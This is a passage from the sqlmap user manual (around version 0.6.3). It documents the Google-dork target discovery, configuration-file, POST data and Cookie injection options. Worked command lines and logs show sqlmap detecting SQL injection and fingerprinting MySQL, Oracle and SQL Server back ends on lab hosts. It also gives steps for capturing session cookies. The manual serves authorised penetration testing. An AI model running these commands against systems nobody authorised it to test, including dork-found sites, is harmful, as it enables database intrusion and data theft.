Option: <tt>-g</tt>

<p>

It is also possible to test and inject on <tt>GET</tt> parameters on the

results of your Google dork.

<p>

This option makes sqlmap negotiate with the search engine its session

cookie to be able to perform a search, then sqlmap will retrieve Google

first 100 results for the Google dork expression with <tt>GET</tt> parameters

asking you if you want to test and inject on each possible affected URL.

<p>

Example of Google dorking with expression <tt>site:yourdomain.com

ext:php</tt>:

<tscreen><verb>

$ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1

[hh:mm:38] [INFO] first request to Google to get the session cookie

[hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are

testable hosts

[hh:mm:41] [INFO] sqlmap got a total of 59 targets

[hh:mm:40] [INFO] url 1:

GET http://yourdomain.com/example1.php?foo=12, do you want to test this

url? [y/N/q] n

[hh:mm:43] [INFO] url 2:

GET http://yourdomain.com/example2.php?bar=24, do you want to test this

url? [y/N/q] n

[hh:mm:42] [INFO] url 3:

GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you

want to test this url? [y/N/q] y

[hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483

[hh:mm:45] [INFO] testing if the url is stable, wait a few seconds

[hh:mm:49] [INFO] url is stable

[hh:mm:50] [INFO] testing if GET parameter 'today' is dynamic

[hh:mm:51] [INFO] confirming that GET parameter 'today' is dynamic

[hh:mm:53] [INFO] GET parameter 'today' is dynamic

[hh:mm:54] [INFO] testing sql injection on GET parameter 'today'

[hh:mm:56] [INFO] testing numeric/unescaped injection on GET parameter 'today'

[hh:mm:57] [INFO] confirming numeric/unescaped injection on GET parameter 'today'

[hh:mm:58] [INFO] GET parameter 'today' is numeric/unescaped injectable

[...]

</verb></tscreen>

<sect2>Load options from a configuration INI file

<p>

Option: <tt>-c</tt>

<p>

It is possible to pass user's options from a configuration INI file, an

example is <tt>sqlmap.conf</tt>.

<p>

Example on a <bf>MySQL 5.0.67</bf> target:

<tscreen><verb>

$ python sqlmap.py -c "sqlmap.conf"

[hh:mm:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic

[hh:mm:42] [WARNING] GET parameter 'cat' is not dynamic

back-end DBMS: MySQL >= 5.0.0

</verb></tscreen>

<p>

Note that if you also provide other options from command line, those are

evaluated when running sqlmap and overwrite the same options, if set, in

the provided configuration file.

<sect1>Request

<p>

These options can be used to specify how to connect to the target url.

<sect2>HTTP method: <tt>GET</tt> or <tt>POST</tt>

<p>

Options: <tt>--method</tt> and <tt>--data</tt>

<p>

By default the HTTP method used to perform HTTP requests is <tt>GET</tt>,

but you can change it to <tt>POST</tt> and provide the data to be sent

through <tt>POST</tt> request. Such data, being those parameters, are

tested for SQL injection like the <tt>GET</tt> parameters.

<p>

Example on an <bf>Oracle XE 10.2.0.1</bf> target:

<tscreen><verb>

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/post_int.php" --method POST \

--data "id=1"

[hh:mm:53] [INFO] testing connection to the target url

[hh:mm:53] [INFO] testing if the url is stable, wait a few seconds

[hh:mm:54] [INFO] url is stable

[hh:mm:54] [INFO] testing if POST parameter 'id' is dynamic

[hh:mm:54] [INFO] confirming that POST parameter 'id' is dynamic

[hh:mm:54] [INFO] POST parameter 'id' is dynamic

[hh:mm:54] [INFO] testing sql injection on POST parameter 'id'

[hh:mm:54] [INFO] testing numeric/unescaped injection on POST parameter 'id'

[hh:mm:54] [INFO] confirming numeric/unescaped injection on POST parameter 'id'

[hh:mm:54] [INFO] POST parameter 'id' is numeric/unescaped injectable

[...]

[hh:mm:54] [INFO] testing Oracle

[hh:mm:54] [INFO] query: LENGTH(SYSDATE)

[hh:mm:54] [INFO] retrieved: 9

[hh:mm:54] [INFO] performed 13 queries in 0 seconds

[hh:mm:54] [INFO] confirming Oracle

[hh:mm:54] [INFO] query: SELECT VERSION FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1

[hh:mm:54] [INFO] retrieved: 10.2.0.1.0

[hh:mm:55] [INFO] performed 76 queries in 0 seconds

web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: Oracle

</verb></tscreen>

<sect2>HTTP <tt>Cookie</tt> header

<p>

Option: <tt>--cookie</tt>

<p>

This feature can be useful in two scenarios:

<itemize>

<item>The web application requires authentication based upon cookies and

you have such data.

<item>You want to test for and exploit SQL injection on such header

values.

</itemize>

<p>

The steps to go through in the second scenario are the following:

<itemize>

<item>On Firefox web browser login on the web authentication form while

dumping URL requests with <htmlurl url="http://tamperdata.mozdev.org/"

name="TamperData"> browser's extension.

<item>In the horizontal box of the extension select your authentication

transaction then in the left box on the bottom click with the right button

on the <tt>Cookie</tt> value, then click on <tt>Copy</tt> to save its

value to the clipboard.

<item>Go back to your shell and run sqlmap.

</itemize>

<p>

Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:

<tscreen><verb>

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/cookie_int.php" --cookie \

"id=1" -v 1

[hh:mm:37] [INFO] testing connection to the target url

[hh:mm:37] [INFO] testing if the url is stable, wait a few seconds

[hh:mm:38] [INFO] url is stable

[hh:mm:38] [INFO] testing if Cookie parameter 'id' is dynamic

[hh:mm:38] [INFO] confirming that Cookie parameter 'id' is dynamic

[hh:mm:38] [INFO] Cookie parameter 'id' is dynamic

[hh:mm:38] [INFO] testing sql injection on Cookie parameter 'id'

[hh:mm:38] [INFO] testing numeric/unescaped injection on Cookie parameter 'id'

[hh:mm:38] [INFO] confirming numeric/unescaped injection on Cookie parameter 'id'

[hh:mm:38] [INFO] Cookie parameter 'id' is numeric/unescaped injectable

[...]

</verb></tscreen>

<p>

Note that the HTTP <tt>Cookie</tt> header values are separated by a

<tt>;</tt> character, <bf>not</bf> by an <tt>&amp;</tt>.

<p>

If the web application at first HTTP response has within the HTTP headers

a <tt>Set-Cookie</tt> header, sqlmap will automatically use it in all HTTP

requests as the HTTP <tt>Cookie</tt> header and also test for SQL

injection on these values.

<p>

Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:

<tscreen><verb>

$ python sqlmap.py -u "http://192.168.1.125/sqlmap/get_str.asp?name=luther" -v 3

[...]

[hh:mm:39] [INFO] testing connection to the target url

[hh:mm:39] [TRAFFIC OUT] HTTP request:

GET /sqlmap/get_str.asp?name=luther HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: 192.168.1.125:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)

Cookie: ASPSESSIONIDSABTRCAS=HPCBGONANJBGFJFHGOKDMCGJ

Connection: close

[...]

[hh:mm:40] [INFO] url is stable

[...]

[hh:mm:40] [INFO] testing if Cookie parameter 'ASPSESSIONIDSABTRCAS' is dynamic

[hh:mm:40] [TRAFFIC OUT] HTTP request:

GET /sqlmap/get_str.asp?name=luther HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: 192.168.1.125:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

Cookie: ASPSESSIONIDSABTRCAS=469

User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)

Connection: close

[hh:mm:40] [WARNING] Cookie parameter 'ASPSESSIONIDSABTRCAS' is not dynamic

[...]

</verb></tscreen>

<p>

If you provide an HTTP <tt>Cookie</tt> header value and the target URL

sends an HTTP <tt>Set-Cookie</tt> header, sqlmap asks you which one to use